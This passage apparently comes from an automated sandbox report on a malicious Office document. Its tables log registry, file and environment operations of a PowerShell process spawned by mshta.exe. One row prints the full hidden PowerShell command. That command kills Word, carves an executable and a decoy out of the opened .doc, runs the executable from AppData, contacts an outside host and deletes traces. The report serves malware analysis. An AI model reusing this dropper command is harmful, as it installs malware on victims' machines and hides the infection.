| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HOMEPATH, result_out = \Users\aETAdzjz |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
4 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
5 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
3 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HomePath, result_out = \Users\aETAdzjz |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
11 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Documents\WindowsPowerShell\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
6 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Unmap | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Environment | Get Environment String | name = MshEnableTrace |
|
21 | |
| Environment | Get Environment String | name = APPDATA, result_out = C:\Users\aETAdzjz\AppData\Roaming |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\result.exex, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 |
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | "C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe" -WindowStyle Hidden Try{$ada="""$env:APPDATA\result.exe""";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf="""$env:TEMP\o.tmp""";taskkill /f /im winword.exe;Function pr{Try{$k="""HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency\StartupItems\""";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path """HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency""" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword """$r""";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\).Path;ri """$cd\*""" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;} |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:07, Reason: Child Process |
| Unmonitor | End Time: 00:02:36, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:29 |
| Information | Value |
|---|---|
| PID | 0x2ac |
| Parent PID | 0xbc0 (c:\windows\system32\mshta.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
658
0x
A0C
0x
A14
0x
9A8
0x
A48
0x
A58
0x
9AC
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\roaming\result.exex | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe, size = 2048 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
9 | |
| File | Get Info | filename = C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.config, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
6 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
10 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Environment | Set Environment String | name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| File | Get Info | type = file_type |
|
1 | |
| File | Read | size = 4096, size_out = 4096 |
|
2 | |
| File | Read | size = 4096, size_out = 3315 |
|
1 | |
| File | Read | size = 781, size_out = 0 |
|
1 | |
| File | Read | size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| File | Get Info | type = file_type |
|
1 | |
| File | Read | size = 4096, size_out = 4096 |
|
41 | |
| File | Read | size = 4096, size_out = 436 |
|
1 | |
| File | Read | size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
